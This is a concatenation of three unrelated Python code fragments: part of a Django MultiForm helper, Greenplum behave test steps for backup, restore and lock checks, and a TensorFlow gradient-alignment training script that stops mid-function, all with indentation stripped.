When instantiating a wrapped form, we add its name to the given prefix.
"""
# prefix is already stored on self.prefix by super().__init__,
# so self.add_prefix works.
return self.add_prefix(name)
def get_base_forms(self):
"""
Return a mapping of the forms that this multiform wraps (name -> form).
"""
if not getattr(self, 'base_forms', None):
error_message_fmt = "%s does not define a base_forms attribute."
raise ImproperlyConfigured(error_message_fmt % self.__class__)
# Incidentally, this also makes a shallow copy
return OrderedDict(self.base_forms)
def _combine(self, attr, filter=False,
call=False, call_args=(), call_kwargs=None,
ignore_missing=False):
"""
Combine an attribute (or method) of each wrapped form into an
OrderedDict.
To remove empty values from the dict, pass ``filter=True``.
To call a method, pass ``call=True`` (passing ``call_args`` and
``call_kwargs`` if needed).
"""
if not call_kwargs:
call_kwargs = {}
d = OrderedDict()
for name, form in self.forms.items():
if ignore_missing and not hasattr(form, attr):
if not filter:
d[name] = None
continue
v = getattr(form, attr)
if call:
v = v(*call_args, **call_kwargs)
if not filter or v:
d[name] = v
return d
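# For illustration: ``self._combine('errors', filter=True)`` (as used in
# ``full_clean`` below) returns an OrderedDict mapping each wrapped form's
# name to its non-empty ``errors``, and ``self._combine('save', call=True,
# call_kwargs={'commit': False})`` would call ``save(commit=False)`` on
# every wrapped form and collect the return values.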
def _combine_values(self, *args, **kwargs):
"""
Similar to _combine, but only return the values, not the full dict.
"""
return self._combine(*args, **kwargs).values()
def _combine_chain(self, *args, **kwargs):
"""Use itertools.chain on the combined values."""
return chain.from_iterable(self._combine_values(*args, **kwargs))
# All BaseForm's public methods and properties are implemented next.
# Basically, a call to a MultiForm's method gets dispatched to all the
# wrapped forms and the results get collected either in an OrderedDict
# or in a list.
def __iter__(self):
return chain.from_iterable(self._combine_values('__iter__', call=True))
def __getitem__(self, name):
return self.forms[name]
def _html_output(self, *args, **kwargs):
rendered = self._combine_values('_html_output', call=True, filter=True,
call_args=args, call_kwargs=kwargs)
return mark_safe('\n'.join(rendered))
def non_field_errors(self):
return self._combine('non_field_errors', call=True, filter=True)
def full_clean(self):
# This will call full_clean on all sub-forms
# (and populate their _errors attribute):
self._errors = self._combine('errors', filter=True)
if not self._errors:
# Each sub-form's cleaned_data is now populated
self.cleaned_data = self._combine('cleaned_data')
@property
def changed_data(self):
return self._combine('changed_data', filter=True)
@property
def media(self):
return reduce(operator.add, self._combine_values('media'), Media())
def is_multipart(self):
return any(self._combine_values('is_multipart', call=True))
def hidden_fields(self):
return list(self._combine_chain('hidden_fields', call=True))
def visible_fields(self):
return list(self._combine_chain('visible_fields', call=True))
class MultiModelForm(MultiForm):
"""
A MultiForm that supports a ModelForm's signature.
Also implements a save method.
"""
_baseform_signature = OrderedDict(
list(MultiForm._baseform_signature.items()) + [('instance', None)])
def _init_parent(self, **kwargs):
del kwargs['instance']
super(MultiForm, self).__init__(**kwargs)
def dispatch_init_instance(self, name, instance):
if instance is None:
return None
return getattr(instance, name)
def save(self, commit=True):
# TODO: Find a good API to wrap this in a db transaction
# TODO: allow committing some forms but not others
instances = self._combine('save', call=True,
call_kwargs={'commit': commit})
if commit:
self.save_m2m()
return instances
def save_m2m(self):
# TODO: Find a good API to wrap this in a db transaction
return self._combine('save_m2m', filter=True, call=True,
ignore_missing=True)
|
|
# coding: utf-8
import os
import socket
import time
import gzip
from behave import given, when, then
from gppylib.commands.base import Command, REMOTE, WorkerPool, CommandResult
from gppylib.db import dbconn
from test.behave_utils.utils import getRows, validate_parse_email_file
from gppylib.gparray import GpArray
from gppylib.operations.unix import CheckFile
from test.behave_utils.utils import backup_data_to_file, check_table_exists, validate_restore_data_in_file
# populate_regular_table_data is used below; it is assumed to live in the same behave_utils helpers.
from test.behave_utils.utils import populate_regular_table_data
master_data_dir = os.environ.get('MASTER_DATA_DIRECTORY')
comment_start_expr = '-- '
comment_expr = '-- Name: '
comment_data_expr_a = '-- Data: '
comment_data_expr_b = '-- Data for Name: '
len_start_comment_expr = len(comment_start_expr)
@given('the user locks "{table_name}" in "{lock_mode}" using connection "{conn}" on "{dbname}"')
@when('the user locks "{table_name}" in "{lock_mode}" using connection "{conn}" on "{dbname}"')
@then('the user locks "{table_name}" in "{lock_mode}" using connection "{conn}" on "{dbname}"')
def impl(context, table_name, lock_mode, conn, dbname):
query = "begin; lock table %s in %s" % (table_name, lock_mode)
conn = dbconn.connect(dbconn.DbURL(dbname=dbname))  # TODO: the conn step parameter is overwritten here and never actually used
dbconn.execSQL(conn, query)
context.conn = conn
@when('the user runs the query "{query}" in database "{dbname}" in a worker pool "{poolname}" as soon as pg_class is locked')
@then('the user runs the query "{query}" in database "{dbname}" in a worker pool "{poolname}" as soon as pg_class is locked')
def impl(context, query, dbname, poolname):
pool = WorkerPool(numWorkers=1)
cmd = on_unlock(query,dbname)
pool.addCommand(cmd)
if not hasattr(context, 'pool'):
context.pool = {}
context.pool[poolname] = pool
context.cmd = cmd
@when('the user runs the "{cmd}" in a worker pool "{poolname}"')
@then('the user runs the "{cmd}" in a worker pool "{poolname}"')
def impl(context, cmd, poolname):
command = Command(name='run gpcrondump in a separate thread', cmdStr=cmd)
pool = WorkerPool(numWorkers=1)
pool.addCommand(command)
if not hasattr(context, 'pool'):
context.pool = {}
context.pool[poolname] = pool
context.cmd = cmd
class on_unlock(Command):
def __init__(self, query, dbname):
self.dbname = dbname
self.query = query
self.result = 1
self.completed = False
self.halt = False
Command.__init__(self, 'on unlock', 'on unlock', ctxt=None, remoteHost=None)
def get_results(self):
return CommandResult(self.result, '', '', self.completed, self.halt)
def run(self):
while check_pg_class_lock(self.dbname) != 1:
pass
with dbconn.connect(dbconn.DbURL(dbname=self.dbname)) as conn:
dbconn.execSQL(conn, self.query)
self.result = 0
self.completed = True
self.halt = False
def check_pg_class_lock(dbname):
seg_count = 1
query = """select count(*)
from pg_locks
where relation in (select oid from pg_class where relname='pg_class')
and locktype='relation' and mode='ExclusiveLock'"""
row_count = getRows(dbname, query)[0][0]
return row_count
@given('the "{backup_pg}" has a lock on the pg_class table in "{dbname}"')
@when('the "{backup_pg}" has a lock on the pg_class table in "{dbname}"')
@then('the "{backup_pg}" has a lock on the pg_class table in "{dbname}"')
def impl(context, dbname, backup_pg):
seg_count = 1
timeout = 2
while timeout > 0:
row_count = check_pg_class_lock(dbname)
time.sleep(1)
timeout -= 1
if row_count != seg_count:
raise Exception("Incorrect (number of) lock/locks on pg_class, expected count = %s, received count = %s" % (seg_count, row_count))
@then('the worker pool "{poolname}" is cleaned up')
@when('the worker pool "{poolname}" is cleaned up')
def impl(context, poolname):
pool = context.pool[poolname]
if pool:
pool.join()
for c in pool.getCompletedItems():
result = c.get_results()
context.ret_code = result.rc
context.stdout_message = result.stdout
context.error_message = result.stderr
pool.haltWork()
pool.joinWorkers()
else:
raise Exception('Worker pool is None. The behave step that initializes the worker pool is probably missing.')
@given('the user drops "{tablename}" in "{dbname}" in a worker pool "{poolname}"')
@then('the user drops "{tablename}" in "{dbname}" in a worker pool "{poolname}"')
@when('the user drops "{tablename}" in "{dbname}" in a worker pool "{poolname}"')
def impl(context, tablename, dbname, poolname):
pool = WorkerPool(numWorkers=1)
cmd = Command(name='drop a table in a worker pool', cmdStr="""psql -c "DROP TABLE %s" -d %s""" % (tablename, dbname))
pool.addCommand(cmd)
if not hasattr(context, 'pool'):
context.pool = {}
context.pool[poolname] = pool
@given('the user closes the connection "{conn_name}"')
@when('the user closes the connection "{conn_name}"')
@then('the user closes the connection "{conn_name}"')
def impl(context, conn_name):
query = """ROLLBACK;"""
dbconn.execSQL(context.conn, query)
context.conn.close()
@given('verify that "{backup_pg}" has no lock on the pg_class table in "{dbname}"')
@when('verify that "{backup_pg}" has no lock on the pg_class table in "{dbname}"')
@then('verify that "{backup_pg}" has no lock on the pg_class table in "{dbname}"')
def impl(context, backup_pg, dbname):
query = """select count(*)
from pg_locks
where relation in (select oid from pg_class where relname='pg_class')
and locktype='relation' and mode='ExclusiveLock'"""
row_count = getRows(dbname, query)[0][0]
if row_count != 0:
raise Exception("Found a ExclusiveLock on pg_class")
@given('there is a "{tabletype}" table "{table_name}" with compression "{compression_type}" in "{dbname}" with data and {rowcount} rows')
@when('there is a "{tabletype}" table "{table_name}" with compression "{compression_type}" in "{dbname}" with data and {rowcount} rows')
@then('there is a "{tabletype}" table "{table_name}" with compression "{compression_type}" in "{dbname}" with data and {rowcount} rows')
def impl(context, tabletype, table_name, compression_type, dbname, rowcount):
populate_regular_table_data(context, tabletype, table_name, compression_type, dbname, int(rowcount))
@given('verify the metadata dump file syntax under "{directory}" for comments and types')
@when('verify the metadata dump file syntax under "{directory}" for comments and types')
@then('verify the metadata dump file syntax under "{directory}" for comments and types')
def impl(context, directory):
names = ["Name", "Data", "Data for Name"]
types = ["TABLE", "TABLE DATA", "EXTERNAL TABLE", "ACL", "CONSTRAINT", "COMMENT", "PROCEDURAL LANGUAGE", "SCHEMA", "AOSTORAGEOPTS"]
master_dump_dir = directory if len(directory.strip()) != 0 else master_data_dir
metadata_path = __get_dump_metadata_path(context, master_dump_dir)
# gzip in python 2.6 does not support __exit__, so it cannot be used in "with"
# with gzip.open(metadata_path, 'r') as fd:
fd = None
try:
fd = gzip.open(metadata_path, 'r')
line = None
for line in fd:
if (line[:3] == comment_start_expr):
if (line.startswith(comment_expr) or line.startswith(comment_data_expr_a) or line.startswith(comment_data_expr_b)):
name_k, type_k, schema_k = get_comment_keys(line)
if (name_k not in names and type_k != "Type" and schema_k != "Schema"):
raise Exception("Unknown key in the comment line of the metdata_file '%s'. Please check and confirm if the key is correct" % (metadata_file))
name_v, type_v, schema_v = get_comment_values(line)
if (type_v not in types):
raise Exception("Value of Type in the comment line '%s' of the metadata_file '%s' does not fall under the expected list %s. Please check if the value is correct" %(type_v, metadata_file, types))
if not line:
raise Exception('Metadata file has no data')
finally:
if fd:
fd.close()
@given('verify the metadata dump file does not contain "{target}"')
@when('verify the metadata dump file does not contain "{target}"')
@then('verify the metadata dump file does not contain "{target}"')
def impl(context, target):
metadata_path = __get_dump_metadata_path(context, master_data_dir)
fd = None
try:
fd = gzip.open(metadata_path, 'r')
line = None
for line in fd:
if target in line:
raise Exception("Unexpectedly found %s in metadata file %s" % (target, metadata_path))
if not line:
raise Exception('Metadata file has no data')
finally:
if fd:
fd.close()
@given('verify the metadata dump file does contain "{target}"')
@when('verify the metadata dump file does contain "{target}"')
@then('verify the metadata dump file does contain "{target}"')
def impl(context, target):
metadata_path = __get_dump_metadata_path(context, master_data_dir)
fd = None
try:
fd = gzip.open(metadata_path, 'r')
line = None
for line in fd:
if target in line:
return
if not line:
raise Exception('Metadata file has no data')
raise Exception("Missing text %s in metadata file %s" % (target, metadata_path))
finally:
if fd:
fd.close()
def __get_dump_metadata_path(context, dump_dir):
filename = "gp_dump_1_1_%s.gz" % context.backup_timestamp
metadata_path = os.path.join(dump_dir, "db_dumps", context.backup_timestamp[0:8], filename)
return metadata_path
def get_comment_keys(line):
try:
temp = line[len_start_comment_expr:]
tokens = temp.strip().split(';')
name = tokens[0].split(':')[0].strip()
type = tokens[1].split(':')[0].strip()
schema = tokens[2].split(':')[0].strip()
except:
return (None, None, None)
return (name, type, schema)
def get_comment_values(line):
try:
temp = line[len_start_comment_expr:]
tokens = temp.strip().split(';')
name = tokens[0].split(':')[1].strip()
type = tokens[1].split(':')[1].strip()
schema = tokens[2].split(':')[1].strip()
except:
return (None, None, None)
return (name, type, schema)
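# For example, given an illustrative dump comment line
#   "-- Name: heap_table1; Type: TABLE; Schema: public"
# get_comment_keys() returns ('Name', 'Type', 'Schema') and
# get_comment_values() returns ('heap_table1', 'TABLE', 'public').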
@given('{command} should print {out_msg} to stdout {num} times')
@when('{command} should print {out_msg} to stdout {num} times')
@then('{command} should print {out_msg} to stdout {num} times')
def impl(context, command, out_msg, num):
msg_list = context.stdout_message.split('\n')
msg_list = [x.strip() for x in msg_list]
count = msg_list.count(out_msg)
if count != int(num):
raise Exception("Expected %s to occur %s times. Found %d" % (out_msg, num, count))
@given('verify that {filetype} file is generated in {dir}')
@when('verify that {filetype} file is generated in {dir}')
@then('verify that {filetype} file is generated in {dir}')
def impl(context, filetype, dir):
if dir == 'master_data_directory':
dir = master_data_dir
if filetype == 'report':
filename = '%s/gp_restore_%s.rpt' % (dir, context.backup_timestamp)
if not os.path.isfile(filename):
raise Exception('Report file %s is not present in master data directory' % filename)
elif filetype == 'status':
gparray = GpArray.initFromCatalog(dbconn.DbURL())
if dir == 'segment_data_directory':
primary_segs = [seg for seg in gparray.getDbList() if seg.isSegmentPrimary()]
for seg in primary_segs:
host = seg.getSegmentHostName()
seg_data_dir = seg.getSegmentDataDirectory()
cmd = Command('check status file', "ls %s/gp_restore_status_*_%s" % (seg_data_dir, context.backup_timestamp), ctxt=REMOTE, remoteHost=host)
cmd.run(validateAfter=True)
results = cmd.get_results()
if not results.stdout.strip():
raise Exception('Status file ending with timestamp %s is not present in segment %s data directory' % (context.backup_timestamp, host))
else:
count = 0
primary_segs = [seg for seg in gparray.getDbList() if seg.isSegmentPrimary()]
for seg in primary_segs:
host = seg.getSegmentHostName()
cmd = Command('check status file', "ls %s/gp_restore_status_*_%s" % (dir, context.backup_timestamp), ctxt=REMOTE, remoteHost=host)
cmd.run(validateAfter=True)
results = cmd.get_results()
if results.stdout.strip():
count += 1
else:
raise Exception('Status file not found in segment: %s' % host)
segs = len(primary_segs)
if count != segs:
raise Exception('Expected %d status file but found %d' % (segs, count))
@given('there are no {filetype} files in "{dir}"')
@when('there are no {filetype} files in "{dir}"')
@then('there are no {filetype} files in "{dir}"')
def impl(context, filetype, dir):
if filetype == 'report':
if dir == 'master_data_directory':
dir = master_data_dir
filenames = os.listdir(dir)
for filename in filenames:
if filename.startswith('gp_restore') and filename.endswith('.rpt'):
filename = '%s/%s' % (dir, filename)
os.remove(filename)
if filetype == 'status':
gparray = GpArray.initFromCatalog(dbconn.DbURL())
if dir == 'segment_data_directory':
primary_segs = [seg for seg in gparray.getDbList() if seg.isSegmentPrimary()]
for seg in primary_segs:
host = seg.getSegmentHostName()
seg_data_dir = seg.getSegmentDataDirectory()
cmd = Command('remove status file', "rm -f %s/gp_restore_status_*" % (seg_data_dir), ctxt=REMOTE, remoteHost=host)
cmd.run(validateAfter=True)
else:
primary_segs = [seg for seg in gparray.getDbList() if seg.isSegmentPrimary()]
for seg in primary_segs:
host = seg.getSegmentHostName()
cmd = Command('remove status file', "rm -f %s/gp_restore_status_*" % dir, ctxt=REMOTE, remoteHost=host)
cmd.run(validateAfter=True)
@given('the mail_contacts file does not exist')
@then('the mail_contacts file does not exist')
def impl(context):
if "HOME" in os.environ:
home_mail_file = os.path.join(os.environ["HOME"], "mail_contacts")
if CheckFile(home_mail_file).run():
os.remove(home_mail_file)
if "GPHOME" in os.environ:
mail_file = os.path.join(os.environ["GPHOME"], "bin", "mail_contacts")
if CheckFile(mail_file).run():
os.remove(mail_file)
@given('the mail_contacts file exists')
def impl(context):
context.email_contact = "example_test@gopivotal.com"
if "HOME" in os.environ:
home_mail_file = os.path.join(os.environ["HOME"], "mail_contacts")
mail_contact = home_mail_file
elif "GPHOME" in os.environ:
mail_file = os.path.join(os.environ["GPHOME"], "bin", "mail_contacts")
mail_contact = mail_file
f = open(mail_contact, 'w+')
f.write(context.email_contact)
f.close()
@given('the yaml file "{email_file_path}" stores email details is in proper format')
def impl(context, email_file_path):
try:
validate_parse_email_file(context, email_file_path)
except Exception as e:
raise Exception(str(e))
@given('the yaml file "{email_file_path}" stores email details is not in proper format')
def impl(context, email_file_path):
exception_raised = False
try:
validate_parse_email_file(context, email_file_path)
except Exception as e:
exception_raised = True
if exception_raised == False:
raise Exception("File is in proper format")
@then('verify that emails are sent to the given contacts with appropriate messages after backup of "{dblist}"')
def impl(context, dblist):
cmd_list = []
sending_email_list = []
database_list = dblist.split(',')
stdout = context.stdout_message
for line in stdout.splitlines():
if "Sending mail to" in line:
str = line.split(':-')[1]
sending_email_list.append(str.strip())
if "Email command string=" in line:
log_msg, delim, txt = line.partition('=')
cmd_list.append(txt.strip())
if len(sending_email_list) != len(database_list):
raise Exception("Emails are not sent properly")
count = 0
for dbname in database_list:
#expected email details
for email in context.email_details:
if dbname in email['DBNAME']:
expected_from = email['FROM']
expected_sub = email['SUBJECT']
else:
expected_sub = "Report from gpcrondump on host %s [COMPLETED]" % socket.gethostname()
#original email details
result_cmd = cmd_list[count]
str = result_cmd[result_cmd.find("-s")+4:]
result_sub = (str[:str.find('"')]).strip()
if expected_sub != result_sub:
raise Exception("Subject of the sent email is not correct")
if result_cmd.find("-- -f") >= 0:
result_from = result_cmd[result_cmd.find("-- -f")+6:]
if expected_from != result_from:
raise Exception("ef : RF", expected_from, result_from, count)
#raise Exception("Sender of the sent email is not correct")
count += 1
@then('gpcrondump should print unable to send dump email notification to stdout as warning')
def impl(context):
stdout = context.stdout_message
found = False
for line in stdout.splitlines():
if "Unable to send dump email notification" in line:
found = True
if found is False:
raise Exception("'Unable to send dump email notification' exception is not raised")
@then('verify that function is backedup correctly in "{dumpfile}"')
def impl(context, dumpfile):
buf = """CREATE ORDERED AGGREGATE agg_array(anyelement) (
SFUNC = array_append,
STYPE = anyarray,
INITCOND = '{}'
);"""
if not buf in open(dumpfile).read():
raise Exception("pg_dump did not backup aggregate functions correctly.")
@given('verify that a role "{role_name}" exists in database "{dbname}"')
@then('verify that a role "{role_name}" exists in database "{dbname}"')
def impl(context, role_name, dbname):
query = "select rolname from pg_roles where rolname = '%s'" % role_name
conn = dbconn.connect(dbconn.DbURL(dbname=dbname))
try:
result = getRows(dbname, query)[0][0]
if result != role_name:
raise Exception("Role %s does not exist in database %s." % (role_name, dbname))
except:
raise Exception("Role %s does not exist in database %s." % (role_name, dbname))
@given('there is a list of files "{filenames}" of tables "{table_list}" in "{dbname}" exists for validation')
@when('there is a list of files "{filenames}" of tables "{table_list}" in "{dbname}" exists for validation')
@then('there is a list of files "{filenames}" of tables "{table_list}" in "{dbname}" exists for validation')
def impl(context, filenames, table_list, dbname):
files = [f for f in filenames.split(',')]
tables = [t for t in table_list.split(',')]
for t,f in zip(tables,files):
backup_data_to_file(context, t, dbname, f)
@when('verify with backedup file "{filename}" that there is a "{table_type}" table "{tablename}" in "{dbname}" with data')
@then('verify with backedup file "{filename}" that there is a "{table_type}" table "{tablename}" in "{dbname}" with data')
def impl(context, filename, table_type, tablename, dbname):
if not check_table_exists(context, dbname=dbname, table_name=tablename, table_type=table_type):
raise Exception("Table '%s' does not exist when it should" % tablename)
validate_restore_data_in_file(context, tablename, dbname, filename)
@then('verify that the owner of "{dbname}" is "{expected_owner}"')
def impl(context, dbname, expected_owner):
with dbconn.connect(dbconn.DbURL(dbname=dbname)) as conn:
query = "SELECT pg_catalog.pg_get_userbyid(d.datdba) FROM pg_catalog.pg_database d WHERE d.datname = '%s';" % dbname
actual_owner = dbconn.execSQLForSingleton(conn, query)
if actual_owner != expected_owner:
raise Exception("Database %s has owner %s when it should have owner %s" % (dbname, actual_owner, expected_owner))
@then('verify that {obj} "{objname}" exists in schema "{schemaname}" and database "{dbname}"')
def impl(context, obj, objname, schemaname, dbname):
if obj == 'function':
cmd_sql = "select exists(select '%s.%s'::regprocedure)" % (schemaname, objname)
else:
cmd_sql = "select exists(select * from pg_class where relname='%s' and relnamespace=(select oid from pg_namespace where nspname='%s'))" % (objname, schemaname)
with dbconn.connect(dbconn.DbURL(dbname=dbname)) as conn:
exists = dbconn.execSQLForSingletonRow(conn, cmd_sql)
if exists[0] is not True:
raise Exception("The %s '%s' does not exists in schema '%s' and database '%s' " % (obj, objname, schemaname, dbname) )
@then('verify that "{configString}" appears in the datconfig for database "{dbname}"')
def impl(context, configString, dbname):
with dbconn.connect(dbconn.DbURL(dbname=dbname)) as conn:
query = "select datconfig from pg_database where datname in ('%s');" % dbname
datconfig = dbconn.execSQLForSingleton(conn, query)
if not datconfig or configString not in datconfig:
raise Exception("%s is not in the datconfig for database '%s':\n %s" % (configString, dbname, datconfig))
|
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Model training with TensorFlow eager execution."""
import os
import time
from absl import app
from absl import flags
from absl import logging
import tensorflow.compat.v2 as tf
from extreme_memorization import alignment
from extreme_memorization import cifar100_dataset
from extreme_memorization import cifar10_dataset
from extreme_memorization import convnet
from extreme_memorization import mlp
from extreme_memorization import svhn_dataset
FLAGS = flags.FLAGS
flags.DEFINE_integer('log_interval', 10,
'batches between logging training status')
# 2k epochs by default.
flags.DEFINE_integer('train_epochs', 2000,
'Number of epochs to train for.')
flags.DEFINE_string('output_dir', '/tmp/tensorflow/generalization/',
'Directory to write TensorBoard summaries')
flags.DEFINE_string('model_dir', '/tmp/tensorflow/generalization/checkpoints/',
'Directory to write model checkpoints.')
flags.DEFINE_string('train_input_files',
'/tmp/cifar10/image_cifar10_fingerprint-train*',
'Input pattern for training tfrecords.')
flags.DEFINE_string('test_input_files',
'/tmp/cifar10/image_cifar10_fingerprint-dev*',
'Input pattern for test tfrecords.')
flags.DEFINE_float('learning_rate', 0.01, 'Learning rate.')
flags.DEFINE_bool('no_gpu', False,
'disables GPU usage even if a GPU is available')
flags.DEFINE_bool('custom_init', False, 'Use custom initializers for w_1.')
flags.DEFINE_bool('shuffled_labels', False,
'Use randomized labels instead of true labels.')
flags.DEFINE_float('stddev', 0.001, 'Stddev for random normal init.')
flags.DEFINE_integer('num_units', 1024, 'Number of hidden units.')
flags.DEFINE_integer(
'batch_size', 256, 'Batch size for training and evaluation. When using '
'multiple gpus, this is the global batch size for '
'all devices. For example, if the batch size is 32 '
'and there are 4 GPUs, each GPU will get 8 examples on '
'each step.')
flags.DEFINE_enum(
'model_type', 'mlp', ['mlp', 'convnet'],
'Model architecture type. Either a 2-layer MLP or a ConvNet.')
flags.DEFINE_enum(
'loss_function', 'cross_entropy', ['cross_entropy', 'hinge', 'l2'],
'Choice of loss function: cross entropy, multi-class hinge, '
'or squared loss.')
flags.DEFINE_enum(
'dataset', 'cifar10', ['cifar10', 'cifar100', 'svhn'],
'Which tf.data.Dataset object to initialize.')
flags.DEFINE_enum(
'activation', 'relu', ['sin', 'relu', 'sigmoid'],
'Activation function to be used for MLP model type.')
flags.DEFINE_enum(
'data_format', None, ['channels_first', 'channels_last'],
'A flag to override the data format used in the model. '
'channels_first provides a performance boost on GPU but is not '
'always compatible with CPU. If left unspecified, the data format '
'will be chosen automatically based on whether TensorFlow was '
'built for CPU or GPU.')
def get_dataset():
if FLAGS.dataset == 'cifar10':
return cifar10_dataset
elif FLAGS.dataset == 'cifar100':
return cifar100_dataset
elif FLAGS.dataset == 'svhn':
return svhn_dataset
def get_activation():
if FLAGS.activation == 'sin':
return tf.math.sin
elif FLAGS.activation == 'relu':
return tf.nn.relu
elif FLAGS.activation == 'sigmoid':
return tf.math.sigmoid
def gather_2d(params, indices):
"""Gathers from `params` with a 2D batched `indices` array.
Args:
params: [D0, D1, D2 ... Dn] Tensor
indices: [D0, D1'] integer Tensor
Returns:
result: [D0, D1', D2 ... Dn] Tensor, where
result[i, j, ...] = params[i, indices[i, j], ...]
Raises:
ValueError: if more than one entry in [D2 ... Dn] is not known.
"""
d0 = tf.shape(params)[0]
d1 = tf.shape(params)[1]
d2_dn = params.shape.as_list()[2:]
none_indices = [i for i, s in enumerate(d2_dn) if s is None]
if none_indices:
if len(none_indices) > 1:
raise ValueError(
'More than one entry in D2 ... Dn not known for Tensor %s.' % params)
d2_dn[none_indices[0]] = -1
flatten_params = tf.reshape(params, [d0 * d1] + d2_dn)
flatten_indices = tf.expand_dims(tf.range(d0) * d1, 1) + tf.cast(
indices, dtype=tf.int32)
return tf.gather(flatten_params, flatten_indices)
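# Worked example (shapes chosen for illustration): with params of shape
# [2, 3] and indices [[0], [2]], the flattened offsets become [[0], [5]],
# so the result is [[params[0, 0]], [params[1, 2]]] with shape [2, 1].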
def hinge_loss(labels, logits):
"""Multi-class hinge loss.
Args:
labels: [batch_size] integer Tensor of correct class labels.
logits: [batch_size, num_classes] Tensor of prediction scores.
Returns:
[batch_size] Tensor of the hinge loss value.
"""
label_logits = gather_2d(logits, tf.expand_dims(labels, 1))
return tf.reduce_sum(
tf.math.maximum(0, logits - label_logits + 1.0), axis=1) - 1.0
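# Numeric sketch: for labels=[1] and logits=[[4.5, 5.0, 1.0]], the per-class
# margins max(0, logits - 5.0 + 1.0) are [0.5, 1.0, 0.0]; their sum is 1.5,
# and subtracting the label's own contribution of 1.0 leaves a loss of 0.5.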
def get_squared_loss(logits, labels):
onehot_labels = tf.one_hot(indices=labels, depth=get_dataset().NUM_LABELS)
diff = logits - tf.cast(onehot_labels, tf.float32)
loss_vector = tf.reduce_mean(tf.square(diff), axis=1)
return tf.reduce_mean(loss_vector), loss_vector
def get_softmax_loss(logits, labels):
loss_vector = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits, labels=labels)
return tf.reduce_mean(loss_vector), loss_vector
def get_hinge_loss(logits, labels):
loss_vector = hinge_loss(labels=labels, logits=logits)
return tf.reduce_mean(loss_vector), loss_vector
def loss(logits, labels):
if FLAGS.loss_function == 'cross_entropy':
return get_softmax_loss(logits, labels)
elif FLAGS.loss_function == 'hinge':
return get_hinge_loss(logits, labels)
elif FLAGS.loss_function == 'l2':
return get_squared_loss(logits, labels)
def compute_accuracy(logits, labels):
predictions = tf.argmax(logits, axis=1, output_type=tf.int64)
labels = tf.cast(labels, tf.int64)
return tf.reduce_mean(
tf.cast(tf.equal(predictions, labels), dtype=tf.float32))
def get_image_labels(features, shuffled_labels=False):
images = features['image/encoded']
if shuffled_labels:
labels = features['image/class/shuffled_label']
else:
labels = features['image/class/label']
return images, labels
def train(model, optimizer, dataset, step_counter, log_interval=None):
"""Trains model on `dataset` using `optimizer`."""
start = time.time()
for batch, features in enumerate(dataset):
images, labels = get_image_labels(features, FLAGS.shuffled_labels)
# Record the operations used to compute the loss given the input,
# so that the gradient of the loss with respect to the variables
# can be computed.
with tf.GradientTape(persistent=True) as tape:
tape.watch(images)
logits = model(images, labels, training=True, step=step_counter)
tape.watch(logits)
loss_value, loss_vector = loss(logits, labels)
loss_vector = tf.unstack(loss_vector)
tf.summary.scalar('loss', loss_value, step=step_counter)
tf.summary.scalar(
'accuracy', compute_accuracy(logits, labels), step=step_counter)
logit_grad_vector = []
for i, per_example_loss in enumerate(loss_vector):
logits_grad = tape.gradient(per_example_loss, logits)
logit_grad_vector.append(tf.unstack(logits_grad)[i])
variables = model.trainable_variables
per_label_grads = {}
for label in range(get_dataset().NUM_LABELS):
per_label_grads[label] = []
per_example_grads = []
for i, (per_example_loss, label, logit_grad) in enumerate(
zip(loss_vector, labels, logit_grad_vector)):
grads = tape.gradient(per_example_loss, variables)
grads.append(logit_grad)
per_example_grads.append((grads, label))
per_label_grads[int(label.numpy())].append(grads)
for i, var in enumerate(variables + [logits]):
if i < len(variables):
var_name = var.name
else:
# Last one is logits.
var_name = 'logits'
grad_list = [(grads[0][i], grads[1]) for grads in per_example_grads]
if grad_list[0][0] is None:
logging.info('grad_list none: %s', var_name)
continue
# Okay to restrict this to 10 labels, even for CIFAR100, since computing
# alignment for every label adds significant overhead.
for label in range(10):
label_grad_list = [
grad[0] for grad in grad_list if tf.math.equal(grad[1], label)
]
if not label_grad_list:
logging.info('label_grad_list none: %s', var_name)
continue
label_grad_list = [tf.reshape(grad, [-1]) for grad in label_grad_list]
if len(label_grad_list) > 1:
ggmm = alignment.compute_alignment(label_grad_list)
key = 'grad_alignment/%s/%s' % (label, var_name)
tf.summary.scalar(key, ggmm, step=step_counter)
# Compute gradients, only for trainable variables.
variables = model.trainable_variables
grads = tape.gradient(loss_value, variables)
# Tuple is used for py3, where zip is a generator producing values once.
grads_and_vars = tuple(zip(grads, model.trainable_variables))
for g, v in grads_and_vars:
if g is not None:
tf.summary.scalar(
'Norm/Grad/%s' % v.name, tf.norm(g), step=step_counter)
# Chart all variables.
for v in model.variables:
tf.summary.scalar('Norm/Var/%s' % v.name, tf.norm(v), step=step_counter)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
if log_interval and batch % log_interval == 0:
rate = log_interval / (time.time() - start)
print('Step #%d\tLoss: %.6f (%d steps/sec)' % (batch, loss_value, rate))
start = time.time()
def test(model, dataset, step_counter):
"""Perform an evaluation of `model` on the examples from `dataset`."""
avg_loss = tf.keras.metrics.Mean('loss', dtype=tf.float32)
accuracy = tf.keras.metrics.Accuracy('accuracy', dtype=tf.float32)
for features in dataset:
images, labels = get_image_labels(features, FLAGS.shuffled_labels)
logits = model(images, labels, training=False, step=step_counter)
loss_value, _ = loss(logits, labels)
avg_loss(loss_value)
accuracy(
tf.argmax(logits, axis=1, output_type=tf.int64),
tf.cast(labels, tf.int64))
print('Test set: Average loss: %.4f, Accuracy: %4f%%\n' %
(avg_loss.result(), 100 * accuracy.result()))
with tf.summary.always_record_summaries():
tf.summary.scalar('loss', avg_loss.result(), step=step_counter)
tf.summary.scalar('accuracy', accuracy.result(), step=step_counter)
def run_eager():
"""Run training and eval loop in eager mode."""
# No need to run tf.enable_eager_execution() since it's supposed to be on by
# default in TF 2.0.
# Automatically determine device and data_format
(device, data_format) = ('/gpu:0', 'channels_first')
if FLAGS.no_gpu or not tf.test.is_gpu_available():
(device, data_format) = ('/cpu:0', 'channels_last')
# If data_format is defined in FLAGS, overwrite automatically set value.
if FLAGS.data_format is not None:
data_format = FLAGS.data_format
